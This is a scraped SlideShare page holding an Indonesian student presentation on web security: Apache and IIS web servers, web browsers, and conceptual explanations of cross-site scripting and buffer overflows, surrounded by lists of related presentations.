Sim, ester, hapzi ali, keamanan sistem informasi, universitas mercu buana, 20...Sim, ester, hapzi ali, keamanan sistem informasi, universitas mercu buana, 20...
Sim, ester, hapzi ali, keamanan sistem informasi, universitas mercu buana, 20...
EsTer Rajagukguk
 
Dasar Keamanan Jaringan Komputer
Dasar Keamanan Jaringan KomputerDasar Keamanan Jaringan Komputer
Dasar Keamanan Jaringan Komputer
Selamet Hariadi
 
Slide Keselamatan Wireless Utmm
Slide Keselamatan Wireless UtmmSlide Keselamatan Wireless Utmm
Slide Keselamatan Wireless Utmm
Linuxmalaysia Malaysia
 
Network security
Network securityNetwork security
Network security
AniqAstofa2
 

Recommended

Presentasi web security
Presentasi web securityPresentasi web security
Presentasi web security
inyonoel
 
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
Gusti_Ketut_Suardika
 
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
Afifah Luthfiah
 
2, si & pi,mislia, hapzi ali, si definisi dan jenis penyerangan dan penya...
2, si & pi,mislia, hapzi ali, si definisi dan jenis penyerangan dan penya...2, si & pi,mislia, hapzi ali, si definisi dan jenis penyerangan dan penya...
2, si & pi,mislia, hapzi ali, si definisi dan jenis penyerangan dan penya...
Mislia lia
 
Sim, ester, hapzi ali, keamanan sistem informasi, universitas mercu buana, 20...
Sim, ester, hapzi ali, keamanan sistem informasi, universitas mercu buana, 20...Sim, ester, hapzi ali, keamanan sistem informasi, universitas mercu buana, 20...
Sim, ester, hapzi ali, keamanan sistem informasi, universitas mercu buana, 20...
EsTer Rajagukguk
 
Dasar Keamanan Jaringan Komputer
Dasar Keamanan Jaringan KomputerDasar Keamanan Jaringan Komputer
Dasar Keamanan Jaringan Komputer
Selamet Hariadi
 
Slide Keselamatan Wireless Utmm
Slide Keselamatan Wireless UtmmSlide Keselamatan Wireless Utmm
Slide Keselamatan Wireless Utmm
Linuxmalaysia Malaysia
 
Network security
Network securityNetwork security
Network security
AniqAstofa2
 
Virus, trojan, dan worm
Virus, trojan, dan wormVirus, trojan, dan worm
Virus, trojan, dan worm
Wiralfi Tasnim
 
#IT Security (Kebijakan Keamanan Sistem Jaringan Komputer)
#IT Security (Kebijakan Keamanan Sistem Jaringan Komputer)#IT Security (Kebijakan Keamanan Sistem Jaringan Komputer)
#IT Security (Kebijakan Keamanan Sistem Jaringan Komputer)
P. Irfan syah
 
Kls9 p6 9 oktober 2020
Kls9 p6 9 oktober 2020Kls9 p6 9 oktober 2020
Kls9 p6 9 oktober 2020
AlImamIslamicSchool
 
2, si & pi, fizar rivaldy, hapzi ali, definisi dan jenis penyerangan dan peny...
2, si & pi, fizar rivaldy, hapzi ali, definisi dan jenis penyerangan dan peny...2, si & pi, fizar rivaldy, hapzi ali, definisi dan jenis penyerangan dan peny...
2, si & pi, fizar rivaldy, hapzi ali, definisi dan jenis penyerangan dan peny...
fizarrivaldy
 
Mengenal Internet Security
Mengenal Internet SecurityMengenal Internet Security
Mengenal Internet Security
PT. Jawara Data Nusantara
 
Pertemuan 15 ancaman sistem keamanan komputer
Pertemuan 15 ancaman sistem keamanan komputerPertemuan 15 ancaman sistem keamanan komputer
Pertemuan 15 ancaman sistem keamanan komputer
jumiathyasiz
 
Egw teens student presentation (edit)
Egw teens student presentation (edit)Egw teens student presentation (edit)
Egw teens student presentation (edit)
Muhammad Said Hasibuan
 
Web Hacking (basic)
Web Hacking (basic)Web Hacking (basic)
Web Hacking (basic)
Ammar WK
 
Paper system keamanan skype
Paper system keamanan skypePaper system keamanan skype
Paper system keamanan skype
Meirza Rudyanto
 
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
ShalsabillaDMutiara
 
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
Ryan Julian
 
Keamanan Jaringan - Pertemuan 4
Keamanan Jaringan - Pertemuan 4Keamanan Jaringan - Pertemuan 4
Keamanan Jaringan - Pertemuan 4
Abrianto Nugraha
 
Chapter 7 security web
Chapter 7 security webChapter 7 security web
Chapter 7 security web
Setia Juli Irzal Ismail
 
SIPI, WINDAYANI RAJAGUKGUK, HAPZI ALI, 2018, defenisi dan penyerangan dan pen...
SIPI, WINDAYANI RAJAGUKGUK, HAPZI ALI, 2018, defenisi dan penyerangan dan pen...SIPI, WINDAYANI RAJAGUKGUK, HAPZI ALI, 2018, defenisi dan penyerangan dan pen...
SIPI, WINDAYANI RAJAGUKGUK, HAPZI ALI, 2018, defenisi dan penyerangan dan pen...
WINDAYANI RAJAGUKGUK
 
Si & pi, dian andriani, hapzi ali, definisi dan jenis penyerangan dan penyala...
Si & pi, dian andriani, hapzi ali, definisi dan jenis penyerangan dan penyala...Si & pi, dian andriani, hapzi ali, definisi dan jenis penyerangan dan penyala...
Si & pi, dian andriani, hapzi ali, definisi dan jenis penyerangan dan penyala...
Dian Andriani
 
Juned riandi (09111001055) Distributed Denial of Service (DDos)
Juned riandi (09111001055) Distributed Denial of Service (DDos)Juned riandi (09111001055) Distributed Denial of Service (DDos)
Juned riandi (09111001055) Distributed Denial of Service (DDos)
Juned Riandi
 
Slide Keselamatan Ict Melaka Spoof Melaka 2007 (malay)
Slide Keselamatan Ict Melaka Spoof Melaka 2007 (malay)Slide Keselamatan Ict Melaka Spoof Melaka 2007 (malay)
Slide Keselamatan Ict Melaka Spoof Melaka 2007 (malay)
Linuxmalaysia Malaysia
 
Slaid bab 1.3 Keselamatan Komputer
Slaid bab 1.3 Keselamatan KomputerSlaid bab 1.3 Keselamatan Komputer
Slaid bab 1.3 Keselamatan Komputer
razak12345
 
Sistem Keamanan Komputer.PDF
Sistem Keamanan Komputer.PDFSistem Keamanan Komputer.PDF
Sistem Keamanan Komputer.PDF
Nurdin Al-Azies
 
Tugas pw [21] web server - fix
Tugas pw [21] web server - fixTugas pw [21] web server - fix
Tugas pw [21] web server - fix
kwonnie
 
Tugas Pw [21]
Tugas Pw [21]Tugas Pw [21]
Tugas Pw [21]
guest44fbf5d7
 
Web server mjs
Web server mjsWeb server mjs
Web server mjs
Yudi WindyatmiKabilly
 

More Related Content

What's hot

Virus, trojan, dan worm
Virus, trojan, dan wormVirus, trojan, dan worm
Virus, trojan, dan worm
Wiralfi Tasnim
 
Pertemuan 15 ancaman sistem keamanan komputer
Pertemuan 15 ancaman sistem keamanan komputerPertemuan 15 ancaman sistem keamanan komputer
Pertemuan 15 ancaman sistem keamanan komputer
jumiathyasiz
 
Juned riandi (09111001055) Distributed Denial of Service (DDos)
Juned riandi (09111001055) Distributed Denial of Service (DDos)Juned riandi (09111001055) Distributed Denial of Service (DDos)
Juned riandi (09111001055) Distributed Denial of Service (DDos)
Juned Riandi
 
Slaid bab 1.3 Keselamatan Komputer
Slaid bab 1.3 Keselamatan KomputerSlaid bab 1.3 Keselamatan Komputer
Slaid bab 1.3 Keselamatan Komputer
razak12345
 
Sistem Keamanan Komputer.PDF
Sistem Keamanan Komputer.PDFSistem Keamanan Komputer.PDF
Sistem Keamanan Komputer.PDF
Nurdin Al-Azies
 

What's hot (19)

Virus, trojan, dan worm
Virus, trojan, dan wormVirus, trojan, dan worm
Virus, trojan, dan worm
 
#IT Security (Kebijakan Keamanan Sistem Jaringan Komputer)
#IT Security (Kebijakan Keamanan Sistem Jaringan Komputer)#IT Security (Kebijakan Keamanan Sistem Jaringan Komputer)
#IT Security (Kebijakan Keamanan Sistem Jaringan Komputer)
 
Kls9 p6 9 oktober 2020
Kls9 p6 9 oktober 2020Kls9 p6 9 oktober 2020
Kls9 p6 9 oktober 2020
 
2, si & pi, fizar rivaldy, hapzi ali, definisi dan jenis penyerangan dan peny...
2, si & pi, fizar rivaldy, hapzi ali, definisi dan jenis penyerangan dan peny...2, si & pi, fizar rivaldy, hapzi ali, definisi dan jenis penyerangan dan peny...
2, si & pi, fizar rivaldy, hapzi ali, definisi dan jenis penyerangan dan peny...
 
Mengenal Internet Security
Mengenal Internet SecurityMengenal Internet Security
Mengenal Internet Security
 
Pertemuan 15 ancaman sistem keamanan komputer
Pertemuan 15 ancaman sistem keamanan komputerPertemuan 15 ancaman sistem keamanan komputer
Pertemuan 15 ancaman sistem keamanan komputer
 
Egw teens student presentation (edit)
Egw teens student presentation (edit)Egw teens student presentation (edit)
Egw teens student presentation (edit)
 
Web Hacking (basic)
Web Hacking (basic)Web Hacking (basic)
Web Hacking (basic)
 
Paper system keamanan skype
Paper system keamanan skypePaper system keamanan skype
Paper system keamanan skype
 
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
 
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
 
Keamanan Jaringan - Pertemuan 4
Keamanan Jaringan - Pertemuan 4Keamanan Jaringan - Pertemuan 4
Keamanan Jaringan - Pertemuan 4
 
Chapter 7 security web
Chapter 7 security webChapter 7 security web
Chapter 7 security web
 
SIPI, WINDAYANI RAJAGUKGUK, HAPZI ALI, 2018, defenisi dan penyerangan dan pen...
SIPI, WINDAYANI RAJAGUKGUK, HAPZI ALI, 2018, defenisi dan penyerangan dan pen...SIPI, WINDAYANI RAJAGUKGUK, HAPZI ALI, 2018, defenisi dan penyerangan dan pen...
SIPI, WINDAYANI RAJAGUKGUK, HAPZI ALI, 2018, defenisi dan penyerangan dan pen...
 
Si & pi, dian andriani, hapzi ali, definisi dan jenis penyerangan dan penyala...
Si & pi, dian andriani, hapzi ali, definisi dan jenis penyerangan dan penyala...Si & pi, dian andriani, hapzi ali, definisi dan jenis penyerangan dan penyala...
Si & pi, dian andriani, hapzi ali, definisi dan jenis penyerangan dan penyala...
 
Juned riandi (09111001055) Distributed Denial of Service (DDos)
Juned riandi (09111001055) Distributed Denial of Service (DDos)Juned riandi (09111001055) Distributed Denial of Service (DDos)
Juned riandi (09111001055) Distributed Denial of Service (DDos)
 
Slide Keselamatan Ict Melaka Spoof Melaka 2007 (malay)
Slide Keselamatan Ict Melaka Spoof Melaka 2007 (malay)Slide Keselamatan Ict Melaka Spoof Melaka 2007 (malay)
Slide Keselamatan Ict Melaka Spoof Melaka 2007 (malay)
 
Slaid bab 1.3 Keselamatan Komputer
Slaid bab 1.3 Keselamatan KomputerSlaid bab 1.3 Keselamatan Komputer
Slaid bab 1.3 Keselamatan Komputer
 
Sistem Keamanan Komputer.PDF
Sistem Keamanan Komputer.PDFSistem Keamanan Komputer.PDF
Sistem Keamanan Komputer.PDF
 

Similar to web-security

Tugas pw [21] web server - fix
Tugas pw [21] web server - fixTugas pw [21] web server - fix
Tugas pw [21] web server - fix
kwonnie
 
Perkembangan web server di linux
Perkembangan web server di linuxPerkembangan web server di linux
Perkembangan web server di linux
NursaniATakome
 
Laporan praktikum modul 3
Laporan praktikum modul 3Laporan praktikum modul 3
Laporan praktikum modul 3
Devandy Enda
 
Sistem keamanan komputer
Sistem keamanan komputerSistem keamanan komputer
Sistem keamanan komputer
Rhusman 05
 
Ci indonesia
Ci indonesiaCi indonesia
Ci indonesia
kaniadona
 
Ci indonesia
Ci indonesiaCi indonesia
Ci indonesia
kaniadona
 
Tugas 2 0317-nurul azmi-1412510587
Tugas 2 0317-nurul azmi-1412510587Tugas 2 0317-nurul azmi-1412510587
Tugas 2 0317-nurul azmi-1412510587
nurul azmi
 
Perkembangan web server di Linux
Perkembangan web server di LinuxPerkembangan web server di Linux
Perkembangan web server di Linux
Tugas_SO2
 

Similar to web-security (20)

Tugas pw [21] web server - fix
Tugas pw [21] web server - fixTugas pw [21] web server - fix
Tugas pw [21] web server - fix
 
Tugas Pw [21]
Tugas Pw [21]Tugas Pw [21]
Tugas Pw [21]
 
Web server mjs
Web server mjsWeb server mjs
Web server mjs
 
Perkembangan web server
Perkembangan web serverPerkembangan web server
Perkembangan web server
 
Perkembangan web server di linux
Perkembangan web server di linuxPerkembangan web server di linux
Perkembangan web server di linux
 
Laporan praktikum modul 3
Laporan praktikum modul 3Laporan praktikum modul 3
Laporan praktikum modul 3
 
Sejarah web server
Sejarah web serverSejarah web server
Sejarah web server
 
Sistem keamanan komputer
Sistem keamanan komputerSistem keamanan komputer
Sistem keamanan komputer
 
Sistem keamanan komputer
Sistem keamanan komputerSistem keamanan komputer
Sistem keamanan komputer
 
Tugas 2 0317 (Individu)
Tugas 2 0317 (Individu)Tugas 2 0317 (Individu)
Tugas 2 0317 (Individu)
 
Tug as ii
Tug as iiTug as ii
Tug as ii
 
Tugas afi
Tugas afiTugas afi
Tugas afi
 
Tug as
Tug asTug as
Tug as
 
Ci indonesia
Ci indonesiaCi indonesia
Ci indonesia
 
Ci indonesia
Ci indonesiaCi indonesia
Ci indonesia
 
Tugas 2 0317-nurul azmi-1412510587
Tugas 2 0317-nurul azmi-1412510587Tugas 2 0317-nurul azmi-1412510587
Tugas 2 0317-nurul azmi-1412510587
 
Perkembangan web server di Linux
Perkembangan web server di LinuxPerkembangan web server di Linux
Perkembangan web server di Linux
 
Tugas 2 0317-fahreza yozi-1612510832
Tugas 2 0317-fahreza yozi-1612510832Tugas 2 0317-fahreza yozi-1612510832
Tugas 2 0317-fahreza yozi-1612510832
 
Kkpi web browser
Kkpi web browserKkpi web browser
Kkpi web browser
 
Tugas rekweb 0316 arifmunandar 1312510124
Tugas rekweb 0316 arifmunandar 1312510124Tugas rekweb 0316 arifmunandar 1312510124
Tugas rekweb 0316 arifmunandar 1312510124
 

Recently uploaded

Modul 2 - Bagaimana membangun lingkungan belajar yang mendukung transisi PAUD...
Modul 2 - Bagaimana membangun lingkungan belajar yang mendukung transisi PAUD...Modul 2 - Bagaimana membangun lingkungan belajar yang mendukung transisi PAUD...
Modul 2 - Bagaimana membangun lingkungan belajar yang mendukung transisi PAUD...
pipinafindraputri1
 
HAK DAN KEWAJIBAN WARGA NEGARA ppkn i.ppt
HAK DAN KEWAJIBAN WARGA NEGARA ppkn i.pptHAK DAN KEWAJIBAN WARGA NEGARA ppkn i.ppt
HAK DAN KEWAJIBAN WARGA NEGARA ppkn i.ppt
nabilafarahdiba95
 
Aksi Nyata Sosialisasi Profil Pelajar Pancasila.pdf
Aksi Nyata Sosialisasi Profil Pelajar Pancasila.pdfAksi Nyata Sosialisasi Profil Pelajar Pancasila.pdf
Aksi Nyata Sosialisasi Profil Pelajar Pancasila.pdf
JarzaniIsmail
 

Recently uploaded (20)

OPTIMALISASI KOMUNITAS BELAJAR DI SEKOLAH.pptx
OPTIMALISASI KOMUNITAS BELAJAR DI SEKOLAH.pptxOPTIMALISASI KOMUNITAS BELAJAR DI SEKOLAH.pptx
OPTIMALISASI KOMUNITAS BELAJAR DI SEKOLAH.pptx
 
Intellectual Discourse Business in Islamic Perspective - Mej Dr Mohd Adib Abd...
Intellectual Discourse Business in Islamic Perspective - Mej Dr Mohd Adib Abd...Intellectual Discourse Business in Islamic Perspective - Mej Dr Mohd Adib Abd...
Intellectual Discourse Business in Islamic Perspective - Mej Dr Mohd Adib Abd...
 
AKSI NYATA TOPIK 1 MERDEKA BELAJAR. PPTX
AKSI NYATA TOPIK 1 MERDEKA BELAJAR. PPTXAKSI NYATA TOPIK 1 MERDEKA BELAJAR. PPTX
AKSI NYATA TOPIK 1 MERDEKA BELAJAR. PPTX
 
Modul 2 - Bagaimana membangun lingkungan belajar yang mendukung transisi PAUD...
Modul 2 - Bagaimana membangun lingkungan belajar yang mendukung transisi PAUD...Modul 2 - Bagaimana membangun lingkungan belajar yang mendukung transisi PAUD...
Modul 2 - Bagaimana membangun lingkungan belajar yang mendukung transisi PAUD...
 
SOAL PUBLIC SPEAKING UNTUK PEMULA PG & ESSAY
SOAL PUBLIC SPEAKING UNTUK PEMULA PG & ESSAYSOAL PUBLIC SPEAKING UNTUK PEMULA PG & ESSAY
SOAL PUBLIC SPEAKING UNTUK PEMULA PG & ESSAY
 
Prov.Jabar_1504_Pengumuman Seleksi Tahap 2_CGP A11 (2).pdf
Prov.Jabar_1504_Pengumuman Seleksi Tahap 2_CGP A11 (2).pdfProv.Jabar_1504_Pengumuman Seleksi Tahap 2_CGP A11 (2).pdf
Prov.Jabar_1504_Pengumuman Seleksi Tahap 2_CGP A11 (2).pdf
 
Regresi Linear Kelompok 1 XI-10 revisi (1).pptx
Regresi Linear Kelompok 1 XI-10 revisi (1).pptxRegresi Linear Kelompok 1 XI-10 revisi (1).pptx
Regresi Linear Kelompok 1 XI-10 revisi (1).pptx
 
MODUL AJAR IPAS KELAS 3 KURIKULUM MERDEKA.pdf
MODUL AJAR IPAS KELAS 3 KURIKULUM MERDEKA.pdfMODUL AJAR IPAS KELAS 3 KURIKULUM MERDEKA.pdf
MODUL AJAR IPAS KELAS 3 KURIKULUM MERDEKA.pdf
 
E-modul Materi Ekosistem untuk kelas X SMA
E-modul Materi Ekosistem untuk kelas X SMAE-modul Materi Ekosistem untuk kelas X SMA
E-modul Materi Ekosistem untuk kelas X SMA
 
7.PPT TENTANG TUGAS Keseimbangan-AD-AS .pptx
7.PPT TENTANG TUGAS Keseimbangan-AD-AS .pptx7.PPT TENTANG TUGAS Keseimbangan-AD-AS .pptx
7.PPT TENTANG TUGAS Keseimbangan-AD-AS .pptx
 
Aksi Nyata Disiplin Positif Keyakinan Kelas untuk SMK
Aksi Nyata Disiplin Positif Keyakinan Kelas untuk SMKAksi Nyata Disiplin Positif Keyakinan Kelas untuk SMK
Aksi Nyata Disiplin Positif Keyakinan Kelas untuk SMK
 
PPT MODUL 6 DAN 7 PDGK4105 KELOMPOK.pptx
PPT MODUL 6 DAN 7 PDGK4105 KELOMPOK.pptxPPT MODUL 6 DAN 7 PDGK4105 KELOMPOK.pptx
PPT MODUL 6 DAN 7 PDGK4105 KELOMPOK.pptx
 
HAK DAN KEWAJIBAN WARGA NEGARA ppkn i.ppt
HAK DAN KEWAJIBAN WARGA NEGARA ppkn i.pptHAK DAN KEWAJIBAN WARGA NEGARA ppkn i.ppt
HAK DAN KEWAJIBAN WARGA NEGARA ppkn i.ppt
 
Aksi Nyata Sosialisasi Profil Pelajar Pancasila.pdf
Aksi Nyata Sosialisasi Profil Pelajar Pancasila.pdfAksi Nyata Sosialisasi Profil Pelajar Pancasila.pdf
Aksi Nyata Sosialisasi Profil Pelajar Pancasila.pdf
 
LATAR BELAKANG JURNAL DIALOGIS REFLEKTIF.ppt
LATAR BELAKANG JURNAL DIALOGIS REFLEKTIF.pptLATAR BELAKANG JURNAL DIALOGIS REFLEKTIF.ppt
LATAR BELAKANG JURNAL DIALOGIS REFLEKTIF.ppt
 
Pendidikan-Bahasa-Indonesia-di-SD MODUL 3 .pptx
Pendidikan-Bahasa-Indonesia-di-SD MODUL 3 .pptxPendidikan-Bahasa-Indonesia-di-SD MODUL 3 .pptx
Pendidikan-Bahasa-Indonesia-di-SD MODUL 3 .pptx
 
BAHAN PAPARAN UU DESA NOMOR 3 TAHUN 2024
BAHAN PAPARAN UU DESA NOMOR 3 TAHUN 2024BAHAN PAPARAN UU DESA NOMOR 3 TAHUN 2024
BAHAN PAPARAN UU DESA NOMOR 3 TAHUN 2024
 
Program Kerja Public Relations - Perencanaan
Program Kerja Public Relations - PerencanaanProgram Kerja Public Relations - Perencanaan
Program Kerja Public Relations - Perencanaan
 
power point bahasa indonesia "Karya Ilmiah"
power point bahasa indonesia "Karya Ilmiah"power point bahasa indonesia "Karya Ilmiah"
power point bahasa indonesia "Karya Ilmiah"
 
vIDEO kelayakan berita untuk mahasiswa.ppsx
vIDEO kelayakan berita untuk mahasiswa.ppsxvIDEO kelayakan berita untuk mahasiswa.ppsx
vIDEO kelayakan berita untuk mahasiswa.ppsx
 

web-security

  • 1. KELOMPOK 4 WEB SECURITY RAHMAT MUKODAS :12127525 CHANDRA PRATAMA :12127946 DINAR KUSUMA :18120173 ISMAIL SAPUTRA :18121434
  • 2. Pengertian web server Web server adalah suatu server yang memberikan service (layanan) kepada klien yang memita informasi berkaitan dengan web. Web Server sendiri terdiri dari dua komponen. Yang pertama adalah computer itu sendiri dan software web server yang di pakainya. Jadi dapat kesimpulan mesin (komputer) apapun bisa saja enjadi web server asalkan software web server tersedia di mesin (komputer)itu. Salah satu software webserver yang tersedia adalah Apache, tapi selain itu masih banyak lagi web server lainnya seperti ISS,Xitami dll.
  • 3. . Web Server Apache Apache merupakan Aplikasi Web Server yang paling banyak digunakan saat ini, selain dapat berjalan di banyak Operating System seperti Windows, Linux dan lainya, Apache juga bersifat Open Source alias Gratis. Secara default Apache menggunakan Script PHP dan menggunakan MySQL sebagai Data Base nya dan kesemuanya itu dapat di gunakan secara Gratis pula. Kelebihan Web Server Apache . Apache termasuk dalam kategori freeware . Mampu beroperasi pada berbagai paltform sistem operasi . Mudah mengatur konfigurasinya. Kekurangan Web Server Apache * web server Apache tidak memiliki kemampuan mengatur load seperti IIS, sehingga akan terus mem-fork proses baru hingga nilai MaxClients tercapai atau hingga batas yang diizinkan oleh OS. Ini tentunya menguntungkan penyerang karena habisnya RAM akan lebih cepat tercapai *Apache tidak memproses karakter kutip dalam string Referrer dan User-Agent yang dikirimkan oleh Client. Ini berarti Client dapat memformulasi inputnya secara hati hati untuk merusak format baris log akses * Terganggunya proses upload data, yang bisa menyebabkan software salah dalam menerjemahkan ukuran data yang masuk.
  • 4. WB SERVER IIS IIS atau Internet Information Services atau Internet Information Server adalah sebuah HTTP web server yang digunakan dalam sistem operasi server Windows, mulai dari Windows NT 4.0 Server, Windows 2000 Server atau Windows Server 2003. Layanan ini merupakan layanan terintegrasi dalam Windows 2000 Server, Windows Server 2003 atau sebagai add-on dalam Windows NT 4.0. Layanan ini berfungsi sebagai pendukung protokol TCP/IP yang berjalan dalam lapisan aplikasi (application layer). IIS juga menjadi fondasi dari platform Internet dan Intranet Microsoft, yang mencakup Microsoft Site Server. Kelebihan IIS 1. Lebih kompatibel dengan Windows karena memang IIS adalah keluaran Microsoft 2. Untuk platform .NET, user hanya bisa menggunakan IIS 3. IIS memiliki fitur URL Filtering untuk mem-filter website yang tidak diinginkan 4. Untuk platform .NET, user hanya bisa menggunakan IIS Kekurangan IIS 1. Tidak gratis (web server berbayar) 2. Port 80 (Port untuk layanan web) sangat mudah diserang oleh cracker 3. Keamanan file log juga sangat mudah ditembus sehingga system password pun akan mudah didapatkan.
  • 5. Pengertian web browser Web Browser adalah suatu program atau software yang digunakan untuk menjelajahi internet atau untuk mencari informasi dari suatu web yang tersimpan didalam komputer. Awalnya, web browser berorientasi pada teks dan belum dapat menampilkan gambar. Namun, web browser sekarang tidak hanya menampilkan gambar dan teks saja, tetapi juga memutar file multimedia seperti video dan suara. Web browser juga dapat mengirim dan menerima email, mengelola HTML, sebagai input dan menjadikan halaman web sebagai hasil output yang informative. Dengan menggunakan web browser, para pengguna internet dapat mengakses berbagai informasi yang terdapat di internet dengan mudah. Beberapa contoh web browser diantaranya Internet Explorer, Mozilla, Firefox, Safari, Opera, dll. Hal yang perlu diketahui dalam pencarian suatu informasi adalah pemahaman tentang struktur Fungsi Web Browser : Fungsi Web Browser adalah untuk menampilkan dan melakukan interaksi dengan dukumen-dokumen yang disediakan oleh web server.
  • 6. Contoh Web Browser : - Mozilla Firefox – link, yaitu dibuat oleh mozilla corporation, firefox adalah salah satu web browser open source yang dibangun dengan Gecko layout engine. Tak hanya handal firefox juga didukung oleh sejumlah Add-ons yang dapat diinstall terpisah yang memungkinkan pengguna melakukan sesuai dengan kegunaan Add-ons tersebut. - Internet Exporer – link, yaitu Web browser besutan Microsoft Corporation biasanya dikenal dengan nama pendek IE, sejak 1995 IE mulai di masukan sebagai default sotware pada saat instalasi Sistem Operasi Windows, sejak tulisan ini dibuat IE belum lama ini meluncurkan versi IE8. - Safari – link, yaitu Dibuat oleh Apple Inc, perusahaan yang juga memproduksi komputer Macintosh, iPod, dan juga iPhone. dibangun dengan browser engine WebKit, WebKit juga adalah browser engine pertama yang lulus test Acid3. - Flock – link, yaitu Flock adalah web browser yang dibangun dengan code mozilla frefox yang web browser ini khususkan menyediakan social networking dan Web 2.0. Flock didesain untuk memudahkan aktivitas online pengguna internet mengatur beberapa social networking, web mail, news feeds dan blogs yang mereka miliki. Dengan Mengunakan Flock mereka dapat dengan mudah menjelajah, berbagi, dan menikmati content maupun menjalin hubungan di situs pertemanan yang mereka inginkan. - Opera – link, yaitu Opera dikembangkan oleh Opera Software company adalah salah satu Web Browser dan juga Internet Suite. Jika firefox punya Add-ons, Opera punya “Opera Widgets”, sebuah aplikasi web kecil yang dijalankan bersamaan dengan Opera yang mempunyai kegunaan tertentu, layaknya Add-ons firefox.
  • 7. unvalidated input -cross site scripting XSS merupakan kependekan yang digunakan untuk istilah cross site scripting. XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script codelainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya. Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet. - buffer overlows Buffer Overflow merupakan salah satu penyebab yang paling banyak menimbulkan masalah pada keamanan komputer baik yang bersifat lokal maupun jaringan. Serangan Buffer overflow terjadi ketika si Attacker memberikan input yang berlebihan pada program yang di jalankan, sehingga program mengalami kelebihan muatan dan memory tidak dapat mengalokasikannya. Ini memberikan kesempatan kepada Attacker untuk menindih data pada program dan men-takeover control program yang dieksekusi attacker.
  • 8. Dengan tersedianya program-program eksploitasi di Internet, baik dalam bentuk source code maupun binary seringkali menjadi menjadi alat untuk membuka celah keamanan sehingga membuat orang tertarik untuk melakukan eksperimen yang sporadis tanpa memperdulikan akibat yang dapat ditimbulkannya. Banyak orang yang mengklaim dirinya sebagai seorang cracker jika sudah berhasil mengekspoitasi komputer orang lain, tanpa memahami cara kerja eksploitasi tersebut sesungguhnya. Buffer overflow merupakan hasil dari dari kelemahan bahasa pemrograman c, c++, fortran, dan assembly, yang tidak secara otomatis melakukan pengecekan batas input ketika program dieksekusi. Sebagai akibat dari Buffer overflow dapat menyebatkan crash pada program, atau mempersilahkan si Attacker untuk mengeksekusi perintah atau koding jahatnya untuk menguasai sistem target, seperti tujuan mengambil alih akun root menggunakan metode Buffer overflow. Dan penyebab terjadinya buffer overflow, Pada banyak kasus, eksploitasi buffer overflow digunakan untuk melakukan penyerangan terhadap aplikasi tertentu dan bahkan pada system operasi tertentu. Pada dasarnya, setiap kali program membaca atau meng-copy data kedalam buffer, ia akan mengecek dahulu apakah ada cukup space/ ruang untuk melakukan copy. Suatu perkecualian adalah jika dapat menunjukkan hal itu tidak dapat terjadi, tetapi kebanyakan program akan berubah setiap saat yang dapat membuat yang tak mungkin menjadi mungkin. Biasanya, pada pemrograman yang menggunakan C/C++ lah yang banyak terjadi kasus kasus buffer overflow,
  • 9. Overwriting Function’s Return Addresses Seperti yang kita tahu, sangat mudah untuk melakukan overwriting function’s return addresses, attacker menggunakan teknik buffer overflow untuk mendapatkan akses root. Attacker mencoba mengesekusi buffer buffer overflowwing area, menimpa nilai dari return address yang mengisi nilai ke buffer dan mengesekusi kode jahatnya. Sebagai kode yang bisa dimasukkan ke dalam program menggunakan environment variabel atau program input parameters. Sebagai contoh coding yang bisa mendapatkan shell akun root pada paper yang ditulis oleh aleph One untu Phrack Magazine di http://destory.net/machines/security/p49-14-aleph-one Tindakan Untuk Mencegah Buffer Overflow Tidak satupum metode yang dijelaskan di bawah yang benar-benar bisa mencegah kemungkinan serangan, namanyajuga manusia tempatnya salah dan lupa. Tetapi metode dibawah ini, dapat meminimalisir dari kegiatan buffer overflow yang mengakibatkan kerusakan stack.
